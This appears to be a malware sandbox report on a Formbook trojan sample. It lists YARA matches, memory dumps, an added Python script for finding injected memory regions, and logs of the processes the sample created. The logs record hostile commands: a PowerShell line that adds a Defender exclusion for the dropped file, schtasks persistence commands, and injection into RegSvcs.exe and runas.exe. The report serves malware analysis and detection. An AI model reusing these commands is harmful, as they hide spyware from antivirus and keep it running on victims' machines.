Source: C:\Windows\SysWOW64\runas.exe
    Code functions: 17_2_045C2446, 17_2_045B4420, 17_2_045BE4F6, 17_2_04510535, 17_2_045D0591, 17_2_0452C6E0,
                    17_2_04534750, 17_2_04510770, 17_2_0450C7C0, 17_2_045A2000, 17_2_04598158, 17_2_045AA118,
                    17_2_04500100, 17_2_045C81CC, 17_2_045D01AA, 17_2_045C41A2, 17_2_045B0274, 17_2_045902C0,
                    17_2_045CA352, 17_2_0451E3F0, 17_2_045D03E6, 17_2_04510C00, 17_2_04500CF2, 17_2_045B0CB5,
                    17_2_045ACD1F, 17_2_0451AD00, 17_2_0450ADE0, 17_2_04528DBF, 17_2_04510E59, 17_2_045CEE26,
                    17_2_045CEEDB, 17_2_04522E90, 17_2_045CCE93, 17_2_04584F40, 17_2_04530F30, 17_2_045B2F30,
                    17_2_04552F28, 17_2_04502FC8, 17_2_0451CFE0, 17_2_0458EFA0, 17_2_0451A840, 17_2_04512840,
                    17_2_0453E8F0, 17_2_044F68B8, 17_2_04526962, 17_2_045129A0, 17_2_045DA9A6, 17_2_0450EA80,
                    17_2_045CAB40, 17_2_045C6BD7, 17_2_04501460, 17_2_045CF43F, 17_2_045C7571, 17_2_045D95C3,
                    17_2_045AD5B0, 17_2_04555630, 17_2_045C16CC, 17_2_045CF7B0, 17_2_045170C0, 17_2_045BF0CC,
                    17_2_045C70E9
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CF0E017_2_045CF0E0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045DB16B17_2_045DB16B
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0454516C17_2_0454516C
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044FF17217_2_044FF172
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451B1B017_2_0451B1B0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452B2C017_2_0452B2C0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045B12ED17_2_045B12ED
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045152A017_2_045152A0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044FD34C17_2_044FD34C
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C132D17_2_045C132D
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0455739A17_2_0455739A
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04589C3217_2_04589C32
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFCF217_2_045CFCF2
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C1D5A17_2_045C1D5A
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04513D4017_2_04513D40
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C7D7317_2_045C7D73
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452FDC017_2_0452FDC0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04519EB017_2_04519EB0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFF0917_2_045CFF09
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044D3FD517_2_044D3FD5
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_044D3FD217_2_044D3FD2
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04511F9217_2_04511F92
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFFB117_2_045CFFB1
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0457D80017_2_0457D800
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045138E017_2_045138E0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0451995017_2_04519950
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452B95017_2_0452B950
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045A591017_2_045A5910
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFA4917_2_045CFA49
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045C7A4617_2_045C7A46
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04583A6C17_2_04583A6C
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045BDAC617_2_045BDAC6
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04555AA017_2_04555AA0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045ADAAC17_2_045ADAAC
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045B1AA317_2_045B1AA3
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_045CFB7617_2_045CFB76
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04585BF017_2_04585BF0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0454DBF917_2_0454DBF9
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0452FB8017_2_0452FB80
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023B1A7017_2_023B1A70
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023ACB8017_2_023ACB80
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023AC96017_2_023AC960
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023AAC0017_2_023AAC00
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023A11A217_2_023A11A2
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023CB1C017_2_023CB1C0
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023B36FB17_2_023B36FB
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023B370017_2_023B3700
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437E4E317_2_0437E4E3
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_043747F417_2_043747F4
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437E3C817_2_0437E3C8
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437E87C17_2_0437E87C
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437D8E817_2_0437D8E8
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_0437CB9317_2_0437CB93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 014D5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0148B970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0151F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0176EA12 appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0150EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01747E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 014E7E54 appears 111 times
                Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 0458F290 appears 105 times
                Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 044FB970 appears 280 times
                Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 04545130 appears 58 times
                Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 04557E54 appears 111 times
                Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 0457EA12 appears 86 times
                Source: nK1Y86mbzfbkwpB.exe | Static PE information: invalid certificate
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000000.2092163926.00000000002B2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWoNP.exe: vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2183096912.0000000005370000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCAA.dll4 vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2183407633.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2177562789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2184155901.0000000007473000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe | Binary or memory string: OriginalFilenameWoNP.exe: vs nK1Y86mbzfbkwpB.exe
                Source: nK1Y86mbzfbkwpB.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
                Source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
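The Formbook rule above fires on unpacked PEs and on thirteen memory dumps spread over seven process indices (the hex index 0x11 in the dump names is the same process 17 whose runas.exe functions are listed above, and 7 is the RegSvcs.exe whose unpacked image also matched). The following is an added example, not code from Joe Sandbox or from this report, that parses those source names and singles out the regions an analyst would pull first: executable memory that is not a mapped image. The field layout of the .sdmp name is an assumption inferred from the names on this page; only the process index and base address are relied on for grouping, the protection and region-type decoding is an interpretation using the documented Win32 PAGE_* and MEM_* constants, and the two fields left undecoded are ones I could not identify. The source list is copied from the matches above plus one contrast entry taken from the OriginalFilename line for the sample's own image.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Documented Win32 constants.
PAGE_PROTECT = {0x01: "NOACCESS", 0x02: "READONLY", 0x04: "READWRITE", 0x08: "WRITECOPY",
                0x10: "EXECUTE", 0x20: "EXECUTE_READ", 0x40: "EXECUTE_READWRITE",
                0x80: "EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED layout, inferred from the names in this report (not documented sandbox behaviour):
#   <process index, hex>.<dump stage>.<dump id>.<base address>.<protection>.<?>.<region type>.<?>.sdmp
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
                     r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.I)
# <process index, decimal>.<stage>.<image name>.<base, hex>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9a-f]+)\.(\d+)(?:\.raw)?\.unpack$", re.I)

# Constructed input: the YARA match sources listed above, plus the sample's own image region
# (last entry, from the OriginalFilename line) as a MEM_IMAGE contrast case.
SOURCES = [
    "7.2.RegSvcs.exe.400000.0.unpack",
    "7.2.RegSvcs.exe.400000.0.raw.unpack",
    "00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp",
    "00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp",
    "00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp",
    "00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp",
    "00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp",
    "00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp",
    "00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp",
    "00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp",
    "0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp",
    "00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp",
    "00000000.00000000.2092163926.00000000002B2000.00000002.00000001.01000000.00000003.sdmp",
]


@dataclass
class Region:
    pid: int
    base: int
    source: str
    protect: Optional[int] = None    # None for unpacked-PE sources: the name carries no page info
    mem_type: Optional[int] = None

    @property
    def executable(self) -> bool:
        return self.protect is not None and bool(self.protect & 0xF0)

    @property
    def protect_name(self) -> str:
        return "n/a" if self.protect is None else PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return "n/a" if self.mem_type is None else MEM_TYPE.get(self.mem_type, hex(self.mem_type))


def parse_source(name: str) -> Optional[Region]:
    """Turn a report source name into a Region, or None if it is neither form."""
    m = SDMP_RE.match(name)
    if m:
        return Region(pid=int(m.group(1), 16), base=int(m.group(4), 16), source=name,
                      protect=int(m.group(5), 16), mem_type=int(m.group(7), 16))
    m = UNPACK_RE.match(name)
    if m:
        return Region(pid=int(m.group(1)), base=int(m.group(4), 16), source=name)
    return None


def by_process(regions):
    groups = defaultdict(list)
    for r in regions:
        groups[r.pid].append(r)
    return dict(groups)


def injected_candidates(regions):
    """Executable memory that is not a loaded image: where injected or unpacked code lives."""
    return [r for r in regions if r.executable and r.mem_type != 0x1000000]


if __name__ == "__main__":
    regs = [r for r in map(parse_source, SOURCES) if r]
    for pid, rs in sorted(by_process(regs).items()):
        for r in rs:
            flag = "INJECTED?" if r.executable and r.mem_type != 0x1000000 else ""
            print(f"pid {pid:2d} base {r.base:#010x} {r.protect_name:18s} {r.type_name:12s} {flag}")
```

Every flagged region here decodes as EXECUTE_READWRITE and, with one private exception in process 7, as a mapped section rather than an image; if the assumed layout holds, that is the footprint of a payload mapped into signed host processes rather than loaded from disk.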
                Source: nK1Y86mbzfbkwpB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: GDhinOc.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.5370000.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, TnyEFwUPfADDx05OZ1.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.nK1Y86mbzfbkwpB.exe.6ee0000.1.raw.unpack, Rwk0pyWBk9DvLIlyWP.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@26/12@6/4
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | File created: C:\Users\user\AppData\Roaming\GDhinOc.exe
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2704:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Mutant created: \Sessions\1\BaseNamedObjects\FqFZDdiN
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | File created: C:\Users\user\AppData\Local\Temp\tmp100A.tmp
                Source: nK1Y86mbzfbkwpB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: nK1Y86mbzfbkwpB.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: runas.exe, 00000011.00000002.3352619446.0000000002884000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3352619446.00000000028B1000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2799708468.0000000002884000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000003.2799465764.0000000002862000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000011.00000002.3352619446.000000000288E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: nK1Y86mbzfbkwpB.exe | ReversingLabs: Detection: 52%
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | File read: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
                Source: unknown | Process created: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe "C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\GDhinOc.exe C:\Users\user\AppData\Roaming\GDhinOc.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Windows\SysWOW64\runas.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp100A.tmp"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GDhinOc" /XML "C:\Users\user\AppData\Local\Temp\tmp3545.tmp"
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
